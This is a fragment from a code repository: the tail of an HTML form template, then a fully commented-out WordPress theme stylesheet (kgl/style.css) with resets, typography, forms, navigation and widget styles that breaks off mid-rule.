class="delete-complete" type="button" onclick="empty()" value="<@s.m "cmsMessage.trash"/>"/> <span id="msgDiv" style="color: red;"></span> </div> </form> </div> <#include "/common/alert_message.html"/> </body> </html>
wp-content/themes/kgl/style.css
daniyarchambylov/kgl
/*html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {*/ /*border: 0;*/ /*font-family: inherit;*/ /*font-size: 100%;*/ /*font-style: inherit;*/ /*font-weight: inherit;*/ /*margin: 0;*/ /*outline: 0;*/ /*padding: 0;*/ /*vertical-align: baseline;*/ /*}*/ /*html {*/ /*-webkit-box-sizing: border-box;*/ /*-moz-box-sizing: border-box;*/ /*box-sizing: border-box;*/ /*font-size: 62.5%;*/ /*overflow-y: scroll;*/ /*-webkit-text-size-adjust: 100%;*/ /*-ms-text-size-adjust: 100%;*/ /*}*/ /**,*/ /**:before,*/ /**:after {*/ /*-webkit-box-sizing: inherit;*/ /*-moz-box-sizing: inherit;*/ /*box-sizing: inherit;*/ /*}*/ /*body {*/ /*background: #f1f1f1;*/ /*}*/ /*article,*/ /*aside,*/ /*details,*/ /*figcaption,*/ /*figure,*/ /*footer,*/ /*header,*/ /*main,*/ /*nav,*/ /*section {*/ /*display: block;*/ /*}*/ /*ol,*/ /*ul {*/ /*list-style: none;*/ /*}*/ /*table {*/ /*border-collapse: separate;*/ /*border-spacing: 0;*/ /*}*/ /*caption,*/ /*th,*/ /*td {*/ /*font-weight: normal;*/ /*text-align: left;*/ /*}*/ /*blockquote:before,*/ /*blockquote:after,*/ /*q:before,*/ /*q:after {*/ /*content: "";*/ /*}*/ /*blockquote,*/ /*q {*/ /*-webkit-hyphens: none;*/ /*-moz-hyphens: none;*/ /*-ms-hyphens: none;*/ /*hyphens: none;*/ /*quotes: none;*/ /*}*/ /*a:focus {*/ /*outline: 2px solid #c1c1c1;*/ /*outline: 2px solid rgba(51, 51, 51, 0.3);*/ /*}*/ /*a:hover,*/ /*a:active {*/ /*outline: 0;*/ /*}*/ /*a img {*/ /*border: 0;*/ /*}*/ /*/!***/ /** 2.0 - Genericons*/ /**!/*/ /*.social-navigation a:before,*/ /*.secondary-toggle:before,*/ /*.dropdown-toggle:after,*/ /*.bypostauthor > article .fn:after,*/ /*.comment-reply-title small a:before,*/ /*.comment-navigation .nav-next a:after,*/ /*.comment-navigation .nav-previous a:before,*/ /*.posted-on:before,*/ /*.byline:before,*/ /*.cat-links:before,*/ /*.tags-links:before,*/ /*.comments-link:before,*/ /*.entry-format:before,*/ /*.edit-link:before,*/ /*.full-size-link:before,*/ /*.pagination .prev:before,*/ /*.pagination .next:before,*/ /*.image-navigation a:before,*/ /*.image-navigation a:after,*/ /*.format-link .entry-title a:after,*/ /*.entry-content .more-link:after,*/ /*.entry-summary .more-link:after,*/ /*.author-link:after {*/ /*-moz-osx-font-smoothing: grayscale;*/ /*-webkit-font-smoothing: antialiased;*/ /*display: inline-block;*/ /*font-family: "Genericons";*/ /*font-size: 16px;*/ /*font-style: normal;*/ /*font-weight: normal;*/ /*font-variant: normal;*/ /*line-height: 1;*/ /*speak: none;*/ /*text-align: center;*/ /*text-decoration: inherit;*/ /*text-transform: none;*/ /*vertical-align: top;*/ /*}*/ /*/!***/ /** 3.0 Typography*/ /**!/*/ /*body,*/ /*button,*/ /*input,*/ /*select,*/ /*textarea {*/ /*color: #333;*/ /*font-family: "Noto Serif", serif;*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*line-height: 1.6;*/ /*}*/ /*h1,*/ /*h2,*/ /*h3,*/ /*h4,*/ /*h5,*/ /*h6 {*/ /*clear: both;*/ /*font-weight: 700;*/ /*}*/ /*p {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*b,*/ /*strong {*/ /*font-weight: 700;*/ /*}*/ /*dfn,*/ /*cite,*/ /*em,*/ /*i {*/ /*font-style: italic;*/ /*}*/ /*blockquote {*/ /*border-left: 4px solid #707070;*/ /*border-left: 4px solid rgba(51, 51, 51, 0.7);*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*font-style: italic;*/ /*line-height: 1.6667;*/ /*margin-bottom: 1.6667em;*/ /*padding-left: 0.7778em;*/ /*}*/ /*blockquote p {*/ /*margin-bottom: 1.6667em;*/ /*}*/ /*blockquote > p:last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*blockquote cite,*/ /*blockquote small {*/ /*color: #333;*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*font-family: "Noto Sans", sans-serif;*/ /*line-height: 1.6;*/ /*}*/ /*blockquote em,*/ /*blockquote i,*/ /*blockquote cite {*/ /*font-style: normal;*/ /*}*/ /*blockquote strong,*/ /*blockquote b {*/ /*font-weight: 400;*/ /*}*/ /*address {*/ /*font-style: italic;*/ /*margin: 0 0 1.6em;*/ /*}*/ /*code,*/ /*kbd,*/ /*tt,*/ /*var,*/ /*samp,*/ /*pre {*/ /*font-family: Inconsolata, monospace;*/ /*-webkit-hyphens: none;*/ /*-moz-hyphens: none;*/ /*-ms-hyphens: none;*/ /*hyphens: none;*/ /*}*/ /*pre {*/ /*background-color: transparent;*/ /*background-color: rgba(0, 0, 0, 0.01);*/ /*border: 1px solid #eaeaea;*/ /*border: 1px solid rgba(51, 51, 51, 0.1);*/ /*line-height: 1.2;*/ /*margin-bottom: 1.6em;*/ /*max-width: 100%;*/ /*overflow: auto;*/ /*padding: 0.8em;*/ /*white-space: pre;*/ /*white-space: pre-wrap;*/ /*word-wrap: break-word;*/ /*}*/ /*abbr[title] {*/ /*border-bottom: 1px dotted #eaeaea;*/ /*border-bottom: 1px dotted rgba(51, 51, 51, 0.1);*/ /*cursor: help;*/ /*}*/ /*mark,*/ /*ins {*/ /*background-color: #fff9c0;*/ /*text-decoration: none;*/ /*}*/ /*sup,*/ /*sub {*/ /*font-size: 75%;*/ /*height: 0;*/ /*line-height: 0;*/ /*position: relative;*/ /*vertical-align: baseline;*/ /*}*/ /*sup {*/ /*bottom: 1ex;*/ /*}*/ /*sub {*/ /*top: .5ex;*/ /*}*/ /*small {*/ /*font-size: 75%;*/ /*}*/ /*big {*/ /*font-size: 125%;*/ /*}*/ /*/!***/ /** 4.0 Elements*/ /**!/*/ /*hr {*/ /*background-color: #eaeaea;*/ /*background-color: rgba(51, 51, 51, 0.1);*/ /*border: 0;*/ /*height: 1px;*/ /*margin-bottom: 1.6em;*/ /*}*/ /*ul,*/ /*ol {*/ /*margin: 0 0 1.6em 1.3333em;*/ /*}*/ /*ul {*/ /*list-style: disc;*/ /*}*/ /*ol {*/ /*list-style: decimal;*/ /*}*/ /*li > ul,*/ /*li > ol {*/ /*margin-bottom: 0;*/ /*}*/ /*dl {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*dt {*/ /*font-weight: bold;*/ /*}*/ /*dd {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*table,*/ /*th,*/ /*td {*/ /*border: 1px solid #eaeaea;*/ /*border: 1px solid rgba(51, 51, 51, 0.1);*/ /*}*/ /*table {*/ /*border-collapse: separate;*/ /*border-spacing: 0;*/ /*border-width: 1px 0 0 1px;*/ /*margin: 0 0 1.6em;*/ /*table-layout: fixed; /!* Prevents HTML tables from becoming too wide *!/*/ /*width: 100%;*/ /*}*/ /*caption,*/ /*th,*/ /*td {*/ /*font-weight: normal;*/ /*text-align: left;*/ /*}*/ /*th {*/ /*border-width: 0 1px 1px 0;*/ /*font-weight: 700;*/ /*}*/ /*td {*/ /*border-width: 0 1px 1px 0;*/ /*}*/ /*th, td {*/ /*padding: 0.4em;*/ /*}*/ /*img {*/ /*-ms-interpolation-mode: bicubic;*/ /*border: 0;*/ /*height: auto;*/ /*max-width: 100%;*/ /*vertical-align: middle;*/ /*}*/ /*figure {*/ /*margin: 0;*/ /*}*/ /*del {*/ /*opacity: 0.8;*/ /*}*/ /*/!* Placeholder text color -- selectors need to be separate to work. *!/*/ /*::-webkit-input-placeholder {*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*}*/ /*:-moz-placeholder {*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*}*/ /*::-moz-placeholder {*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*opacity: 1; /!* Since FF19 lowers the opacity of the placeholder by default *!/*/ /*}*/ /*:-ms-input-placeholder {*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*}*/ /*/!***/ /** 5.0 Forms*/ /**!/*/ /*button,*/ /*input,*/ /*select,*/ /*textarea {*/ /*background-color: #f7f7f7;*/ /*border-radius: 0;*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*line-height: 1.5;*/ /*margin: 0;*/ /*max-width: 100%;*/ /*vertical-align: baseline;*/ /*}*/ /*button,*/ /*input {*/ /*-webkit-hyphens: none;*/ /*-moz-hyphens: none;*/ /*-ms-hyphens: none;*/ /*hyphens: none;*/ /*line-height: normal;*/ /*}*/ /*input,*/ /*textarea {*/ /*background-image: -webkit-linear-gradient(rgba(255, 255, 255, 0), rgba(255, 255, 255, 0)); /!* Removing the inner shadow on iOS inputs *!/*/ /*border: 1px solid #eaeaea;*/ /*border: 1px solid rgba(51, 51, 51, 0.1);*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*}*/ /*input:focus,*/ /*textarea:focus {*/ /*background-color: #fff;*/ /*border: 1px solid #c1c1c1;*/ /*border: 1px solid rgba(51, 51, 51, 0.3);*/ /*color: #333;*/ /*}*/ /*input:focus,*/ /*select:focus {*/ /*outline: 2px solid #c1c1c1;*/ /*outline: 2px solid rgba(51, 51, 51, 0.3);*/ /*}*/ /*button[disabled],*/ /*input[disabled],*/ /*select[disabled],*/ /*textarea[disabled] {*/ /*cursor: default;*/ /*opacity: .5;*/ /*}*/ /*button,*/ /*input[type="button"],*/ /*input[type="reset"],*/ /*input[type="submit"] {*/ /*-webkit-appearance: button;*/ /*background-color: #333;*/ /*border: 0;*/ /*color: #fff;*/ /*cursor: pointer;*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-weight: 700;*/ /*padding: 0.7917em 1.5em;*/ /*text-transform: uppercase;*/ /*}*/ /*button:hover,*/ /*input[type="button"]:hover,*/ /*input[type="reset"]:hover,*/ /*input[type="submit"]:hover,*/ /*button:focus,*/ /*input[type="button"]:focus,*/ /*input[type="reset"]:focus,*/ /*input[type="submit"]:focus {*/ /*background-color: #707070;*/ /*background-color: rgba(51, 51, 51, 0.7);*/ /*outline: 0;*/ /*}*/ /*input[type="search"] {*/ /*-webkit-appearance: textfield;*/ /*}*/ /*input[type="search"]::-webkit-search-cancel-button,*/ /*input[type="search"]::-webkit-search-decoration {*/ /*-webkit-appearance: none;*/ /*}*/ /*button::-moz-focus-inner,*/ /*input::-moz-focus-inner {*/ /*border: 0;*/ /*padding: 0;*/ /*}*/ /*input[type="text"],*/ /*input[type="email"],*/ /*input[type="url"],*/ /*input[type="password"],*/ /*input[type="search"],*/ /*textarea {*/ /*padding: 0.375em;*/ /*width: 100%;*/ /*}*/ /*textarea {*/ /*overflow: auto;*/ /*vertical-align: top;*/ /*}*/ /*input[type="text"]:focus,*/ /*input[type="email"]:focus,*/ /*input[type="url"]:focus,*/ /*input[type="password"]:focus,*/ /*input[type="search"]:focus,*/ /*textarea:focus {*/ /*outline: 0;*/ /*}*/ /*.post-password-form {*/ /*position: relative;*/ /*}*/ /*.post-password-form label {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*display: block;*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-weight: 700;*/ /*letter-spacing: 0.04em;*/ /*line-height: 1.5;*/ /*text-transform: uppercase;*/ /*}*/ /*.post-password-form input[type="submit"] {*/ /*padding: 0.7917em;*/ /*position: absolute;*/ /*right: 0;*/ /*bottom: 0;*/ /*}*/ /*input[type="checkbox"],*/ /*input[type="radio"] {*/ /*padding: 0;*/ /*}*/ /*.search-form input[type="submit"],*/ /*.widget .search-form input[type="submit"] {*/ /*padding: 0;*/ /*}*/ /*/!***/ /** 6.0 Navigations*/ /**!/*/ /*/!***/ /** 6.1 Links*/ /**!/*/ /*a {*/ /*color: #333;*/ /*text-decoration: none;*/ /*}*/ /*a:hover,*/ /*a:focus {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*}*/ /*/!***/ /** 6.2 Menus*/ /**!/*/ /*.main-navigation a {*/ /*display: block;*/ /*padding: 0.8em 0;*/ /*position: relative;*/ /*text-decoration: none;*/ /*}*/ /*.main-navigation ul {*/ /*list-style: none;*/ /*margin: 0;*/ /*}*/ /*.main-navigation ul ul {*/ /*display: none;*/ /*margin-left: 0.8em;*/ /*}*/ /*.main-navigation ul .toggled-on {*/ /*display: block;*/ /*}*/ /*.main-navigation li {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*position: relative;*/ /*}*/ /*.main-navigation .current-menu-item > a,*/ /*.main-navigation .current-menu-ancestor > a {*/ /*font-weight: 700;*/ /*}*/ /*.main-navigation .nav-menu > ul > li:first-child,*/ /*.main-navigation .nav-menu > li:first-child {*/ /*border-top: 0;*/ /*}*/ /*.main-navigation .menu-item-has-children > a {*/ /*padding-right: 48px;*/ /*}*/ /*.main-navigation .menu-item-description {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-weight: 400;*/ /*line-height: 1.5;*/ /*margin-top: 0.5em;*/ /*}*/ /*.no-js .main-navigation ul ul {*/ /*display: block;*/ /*}*/ /*.dropdown-toggle {*/ /*background-color: transparent;*/ /*border: 0;*/ /*-webkit-box-sizing: content-box;*/ /*-moz-box-sizing: content-box;*/ /*box-sizing: content-box;*/ /*content: "";*/ /*height: 42px;*/ /*padding: 0;*/ /*position: absolute;*/ /*text-transform: lowercase; /!* Stop screen readers to read the text as capital letters *!/*/ /*top: 3px;*/ /*right: 0;*/ /*width: 42px;*/ /*}*/ /*.dropdown-toggle:after {*/ /*color: #333;*/ /*content: "\f431";*/ /*font-size: 24px;*/ /*line-height: 42px;*/ /*position: relative;*/ /*top: 0;*/ /*left: 1px;*/ /*width: 42px;*/ /*}*/ /*.dropdown-toggle:hover,*/ /*.dropdown-toggle:focus {*/ /*background-color: #eaeaea;*/ /*background-color: rgba(51, 51, 51, 0.1);*/ /*}*/ /*.dropdown-toggle:focus {*/ /*outline: 1px solid #c1c1c1;*/ /*outline: 1px solid rgba(51, 51, 51, 0.3);*/ /*}*/ /*.dropdown-toggle.toggle-on:after {*/ /*content: "\f432";*/ /*}*/ /*.social-navigation {*/ /*margin: 9.0909% 0;*/ /*}*/ /*.social-navigation ul {*/ /*list-style: none;*/ /*margin: 0 0 -1.6em 0;*/ /*}*/ /*.social-navigation li {*/ /*float: left;*/ /*}*/ /*.social-navigation a {*/ /*display: block;*/ /*height: 3.2em;*/ /*position: relative;*/ /*width: 3.2em;*/ /*}*/ /*.social-navigation a:before {*/ /*content: "\f415";*/ /*font-size: 24px;*/ /*position: absolute;*/ /*top: 0;*/ /*left: 0;*/ /*}*/ /*.social-navigation a[href*="codepen.io"]:before {*/ /*content: "\f216";*/ /*}*/ /*.social-navigation a[href*="digg.com"]:before {*/ /*content: "\f221";*/ /*}*/ /*.social-navigation a[href*="dribbble.com"]:before {*/ /*content: "\f201";*/ /*}*/ /*.social-navigation a[href*="dropbox.com"]:before {*/ /*content: "\f225";*/ /*}*/ /*.social-navigation a[href*="facebook.com"]:before {*/ /*content: "\f203";*/ /*}*/ /*.social-navigation a[href*="flickr.com"]:before {*/ /*content: "\f211";*/ /*}*/ /*.social-navigation a[href*="foursquare.com"]:before {*/ /*content: "\f226";*/ /*}*/ /*.social-navigation a[href*="plus.google.com"]:before {*/ /*content: "\f206";*/ /*}*/ /*.social-navigation a[href*="github.com"]:before {*/ /*content: "\f200";*/ /*}*/ /*.social-navigation a[href*="instagram.com"]:before {*/ /*content: "\f215";*/ /*}*/ /*.social-navigation a[href*="linkedin.com"]:before {*/ /*content: "\f208";*/ /*}*/ /*.social-navigation a[href*="pinterest.com"]:before {*/ /*content: "\f210";*/ /*}*/ /*.social-navigation a[href*="getpocket.com"]:before {*/ /*content: "\f224";*/ /*}*/ /*.social-navigation a[href*="polldaddy.com"]:before {*/ /*content: "\f217";*/ /*}*/ /*.social-navigation a[href*="reddit.com"]:before {*/ /*content: "\f222";*/ /*}*/ /*.social-navigation a[href*="stumbleupon.com"]:before {*/ /*content: "\f223";*/ /*}*/ /*.social-navigation a[href*="tumblr.com"]:before {*/ /*content: "\f214";*/ /*}*/ /*.social-navigation a[href*="twitter.com"]:before {*/ /*content: "\f202";*/ /*}*/ /*.social-navigation a[href*="vimeo.com"]:before {*/ /*content: "\f212";*/ /*}*/ /*.social-navigation a[href*="wordpress.com"]:before,*/ /*.social-navigation a[href*="wordpress.org"]:before {*/ /*content: "\f205";*/ /*}*/ /*.social-navigation a[href*="youtube.com"]:before {*/ /*content: "\f213";*/ /*}*/ /*.social-navigation a[href*="mailto:"]:before {*/ /*content: "\f410";*/ /*}*/ /*.social-navigation a[href*="spotify.com"]:before {*/ /*content: "\f515";*/ /*}*/ /*.social-navigation a[href*="twitch.tv"]:before {*/ /*content: "\f516";*/ /*}*/ /*.social-navigation a[href$="/feed/"]:before {*/ /*content: "\f413";*/ /*}*/ /*.social-navigation a[href*="path.com"]:before {*/ /*content: "\f219";*/ /*}*/ /*.social-navigation a[href*="skype.com"]:before {*/ /*content: "\f220";*/ /*}*/ /*.secondary-toggle {*/ /*background-color: transparent;*/ /*border: 1px solid #eaeaea;*/ /*border: 1px solid rgba(51, 51, 51, 0.1);*/ /*height: 42px;*/ /*overflow: hidden;*/ /*padding: 0;*/ /*position: absolute;*/ /*top: 50%;*/ /*right: 0;*/ /*text-align: center;*/ /*-webkit-transform: translateY(-50%);*/ /*-ms-transform: translateY(-50%);*/ /*transform: translateY(-50%);*/ /*width: 42px;*/ /*}*/ /*.secondary-toggle:before {*/ /*color: #333;*/ /*content: "\f419";*/ /*line-height: 40px;*/ /*width: 40px;*/ /*}*/ /*.secondary-toggle:hover,*/ /*.secondary-toggle:focus {*/ /*background-color: transparent;*/ /*border: 1px solid #c1c1c1;*/ /*border: 1px solid rgba(51, 51, 51, 0.3);*/ /*outline: 0;*/ /*}*/ /*.secondary-toggle.toggled-on:before {*/ /*content: "\f405";*/ /*font-size: 32px;*/ /*position: relative;*/ /*top: 1px;*/ /*left: -1px;*/ /*}*/ /*.post-navigation {*/ /*background-color: #fff;*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*font-weight: 700;*/ /*}*/ /*.post-navigation a {*/ /*display: block;*/ /*padding: 3.8461% 7.6923%;*/ /*}*/ /*.post-navigation span {*/ /*display: block;*/ /*}*/ /*.post-navigation .meta-nav {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*letter-spacing: 0.04em;*/ /*line-height: 1.5;*/ /*position: relative;*/ /*text-transform: uppercase;*/ /*z-index: 2;*/ /*}*/ /*.post-navigation .post-title {*/ /*font-family: "Noto Serif", serif;*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*position: relative;*/ /*z-index: 2;*/ /*}*/ /*.post-navigation .nav-next,*/ /*.post-navigation .nav-previous {*/ /*background-position: center;*/ /*background-size: cover;*/ /*position: relative;*/ /*}*/ /*.post-navigation a:before {*/ /*content: "";*/ /*display: block;*/ /*height: 100%;*/ /*position: absolute;*/ /*top: 0;*/ /*left: 0;*/ /*width: 100%;*/ /*z-index: 1;*/ /*}*/ /*.post-navigation a:hover:before,*/ /*.post-navigation a:focus:before {*/ /*opacity: 0.5;*/ /*}*/ /*.post-navigation .meta-nav {*/ /*opacity: 0.8;*/ /*}*/ /*.post-navigation div + div {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*}*/ /*.pagination {*/ /*background-color: #fff;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*font-family: "Noto Sans", sans-serif;*/ /*}*/ /*.pagination .nav-links {*/ /*min-height: 3.2em;*/ /*position: relative;*/ /*text-align: center;*/ /*}*/ /*/!* reset screen-reader-text *!/*/ /*.pagination .current .screen-reader-text {*/ /*position: static !important;*/ /*}*/ /*.pagination .page-numbers {*/ /*display: none;*/ /*line-height: 3.2em;*/ /*padding: 0 0.6667em;*/ /*}*/ /*.pagination .page-numbers.current {*/ /*text-transform: uppercase;*/ /*}*/ /*.pagination .current {*/ /*display: inline-block;*/ /*font-weight: 700;*/ /*}*/ /*.pagination .prev,*/ /*.pagination .next {*/ /*-webkit-tap-highlight-color: rgba(255, 255, 255, 0.3);*/ /*background-color: #333;*/ /*color: #fff;*/ /*display: inline-block;*/ /*height: 48px;*/ /*overflow: hidden;*/ /*padding: 0;*/ /*position: absolute;*/ /*width: 48px;*/ /*}*/ /*.pagination .prev:before,*/ /*.pagination .next:before {*/ /*font-size: 32px;*/ /*height: 48px;*/ /*line-height: 48px;*/ /*position: relative;*/ /*width: 48px;*/ /*}*/ /*.pagination .prev:hover,*/ /*.pagination .prev:focus,*/ /*.pagination .next:hover,*/ /*.pagination .next:focus {*/ /*background-color: #707070;*/ /*background-color: rgba(51, 51, 51, 0.7);*/ /*}*/ /*.pagination .prev {*/ /*left: 0;*/ /*}*/ /*.pagination .prev:before {*/ /*content: "\f430";*/ /*left: -1px;*/ /*}*/ /*.pagination .next {*/ /*right: 0;*/ /*}*/ /*.pagination .next:before {*/ /*content: "\f429";*/ /*right: -1px;*/ /*}*/ /*.image-navigation,*/ /*.comment-navigation {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-weight: 700;*/ /*line-height: 1.5;*/ /*text-transform: uppercase;*/ /*}*/ /*.image-navigation a,*/ /*.comment-navigation a {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*}*/ /*.image-navigation a:hover,*/ /*.image-navigation a:focus,*/ /*.comment-navigation a:hover,*/ /*.comment-navigation a:focus {*/ /*color: #333;*/ /*}*/ /*.image-navigation .nav-previous:not(:empty),*/ /*.image-navigation .nav-next:not(:empty),*/ /*.comment-navigation .nav-previous:not(:empty),*/ /*.comment-navigation .nav-next:not(:empty) {*/ /*display: inline-block;*/ /*}*/ /*.image-navigation .nav-previous:not(:empty) + .nav-next:not(:empty):before,*/ /*.comment-navigation .nav-previous:not(:empty) + .nav-next:not(:empty):before {*/ /*content: "\2215";*/ /*font-weight: 400;*/ /*margin: 0 0.7em;*/ /*}*/ /*.image-navigation .nav-previous a:before,*/ /*.comment-navigation .nav-previous a:before {*/ /*content: "\f430";*/ /*margin-right: 0.2em;*/ /*position: relative;*/ /*}*/ /*.image-navigation .nav-next a:after,*/ /*.comment-navigation .nav-next a:after {*/ /*content: "\f429";*/ /*margin-left: 0.2em;*/ /*position: relative;*/ /*}*/ /*.comment-navigation {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*border-bottom: 1px solid #eaeaea;*/ /*border-bottom: 1px solid rgba(51, 51, 51, 0.1);*/ /*padding: 2em 0;*/ /*}*/ /*.comments-title + .comment-navigation {*/ /*border-bottom: 0;*/ /*}*/ /*.image-navigation {*/ /*padding: 0 7.6923%;*/ /*}*/ /*.image-navigation .nav-previous:not(:empty),*/ /*.image-navigation .nav-next:not(:empty) {*/ /*margin-bottom: 2em;*/ /*}*/ /*/!***/ /** 7.0 Accessibility*/ /**!/*/ /*/!* Text meant only for screen readers *!/*/ /*.says,*/ /*.screen-reader-text {*/ /*clip: rect(1px, 1px, 1px, 1px);*/ /*height: 1px;*/ /*overflow: hidden;*/ /*position: absolute !important;*/ /*width: 1px;*/ /*}*/ /*/!* must have higher specificity than alternative color schemes inline styles *!/*/ /*.site .skip-link {*/ /*background-color: #f1f1f1;*/ /*box-shadow: 0 0 1px 1px rgba(0, 0, 0, 0.2);*/ /*color: #21759b;*/ /*display: block;*/ /*font: bold 14px/normal "Noto Sans", sans-serif;*/ /*left: -9999em;*/ /*outline: none;*/ /*padding: 15px 23px 14px;*/ /*text-decoration: none;*/ /*text-transform: none;*/ /*top: -9999em;*/ /*}*/ /*.logged-in .site .skip-link {*/ /*box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6);*/ /*font: bold 14px/normal "Open Sans", sans-serif;*/ /*}*/ /*.site .skip-link:focus {*/ /*clip: auto;*/ /*height: auto;*/ /*left: 6px;*/ /*top: 7px;*/ /*width: auto;*/ /*z-index: 100000;*/ /*}*/ /*/!***/ /** 8.0 Alignments*/ /**!/*/ /*.alignleft {*/ /*display: inline;*/ /*float: left;*/ /*}*/ /*.alignright {*/ /*display: inline;*/ /*float: right;*/ /*}*/ /*.aligncenter {*/ /*display: block;*/ /*margin-right: auto;*/ /*margin-left: auto;*/ /*}*/ /*blockquote.alignleft,*/ /*.wp-caption.alignleft,*/ /*img.alignleft {*/ /*margin: 0.4em 1.6em 1.6em 0;*/ /*}*/ /*blockquote.alignright,*/ /*.wp-caption.alignright,*/ /*img.alignright {*/ /*margin: 0.4em 0 1.6em 1.6em;*/ /*}*/ /*blockquote.aligncenter,*/ /*.wp-caption.aligncenter,*/ /*img.aligncenter {*/ /*clear: both;*/ /*margin-top: 0.4em;*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.wp-caption.alignleft,*/ /*.wp-caption.alignright,*/ /*.wp-caption.aligncenter {*/ /*margin-bottom: 1.2em;*/ /*}*/ /*/!***/ /** 9.0 Clearings*/ /**!/*/ /*.clear:before,*/ /*.clear:after,*/ /*.site:before,*/ /*.site:after,*/ /*.entry-content:before,*/ /*.entry-content:after,*/ /*.comment-content:before,*/ /*.comment-content:after,*/ /*.site-content:before,*/ /*.site-content:after,*/ /*.nav-links:before,*/ /*.nav-links:after,*/ /*.comment-navigation:before,*/ /*.comment-navigation:after,*/ /*.social-navigation ul:before,*/ /*.social-navigation ul:after,*/ /*.textwidget:before,*/ /*.textwidget:after {*/ /*content: "";*/ /*display: table;*/ /*}*/ /*.clear:after,*/ /*.site:after,*/ /*.entry-content:after,*/ /*.comment-content:after,*/ /*.site-content:after,*/ /*.nav-links:after,*/ /*.comment-navigation:after,*/ /*.social-navigation ul:after,*/ /*.textwidget:after {*/ /*clear: both;*/ /*}*/ /*/!***/ /** 10.0 Header*/ /**!/*/ /*.site-header {*/ /*background-color: #fff;*/ /*border-bottom: 1px solid rgba(51, 51, 51, 0.1);*/ /*padding: 7.6923%;*/ /*}*/ /*.site-branding {*/ /*min-height: 2em;*/ /*padding-right: 60px;*/ /*position: relative;*/ /*}*/ /*.site-title {*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*font-weight: 700;*/ /*line-height: 1.3636;*/ /*margin-bottom: 0;*/ /*}*/ /*.site-description {*/ /*display: none;*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-weight: 400;*/ /*line-height: 1.5;*/ /*margin: 0.5em 0 0;*/ /*opacity: 0.7;*/ /*}*/ /*/!***/ /** 11.0 Widgets*/ /**!/*/ /*.widget {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*-webkit-hyphens: auto;*/ /*-moz-hyphens: auto;*/ /*-ms-hyphens: auto;*/ /*hyphens: auto;*/ /*margin: 0 auto 9.09090%;*/ /*width: 100%;*/ /*word-wrap: break-word;*/ /*}*/ /*.widget pre {*/ /*line-height: 1.2;*/ /*}*/ /*.widget button,*/ /*.widget input,*/ /*.widget select,*/ /*.widget textarea {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*line-height: 1.5;*/ /*}*/ /*.widget button,*/ /*.widget input {*/ /*line-height: normal;*/ /*}*/ /*.widget button,*/ /*.widget input[type="button"],*/ /*.widget input[type="reset"],*/ /*.widget input[type="submit"] {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*padding: 0.7917em 1.5833em;*/ /*}*/ /*.widget input[type="text"],*/ /*.widget input[type="email"],*/ /*.widget input[type="url"],*/ /*.widget input[type="password"],*/ /*.widget input[type="search"],*/ /*.widget textarea {*/ /*padding: 0.375em;*/ /*}*/ /*.widget-title {*/ /*color: #333;*/ /*font-family: "Noto Sans", sans-serif;*/ /*margin: 0 0 1.6em;*/ /*letter-spacing: 0.04em;*/ /*text-transform: uppercase;*/ /*}*/ /*.widget > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.widget_calendar table {*/ /*margin: 0;*/ /*}*/ /*.widget_calendar td,*/ /*.widget_calendar th {*/ /*line-height: 2.3333;*/ /*text-align: center;*/ /*padding: 0;*/ /*}*/ /*.widget_calendar caption {*/ /*font-family: "Noto 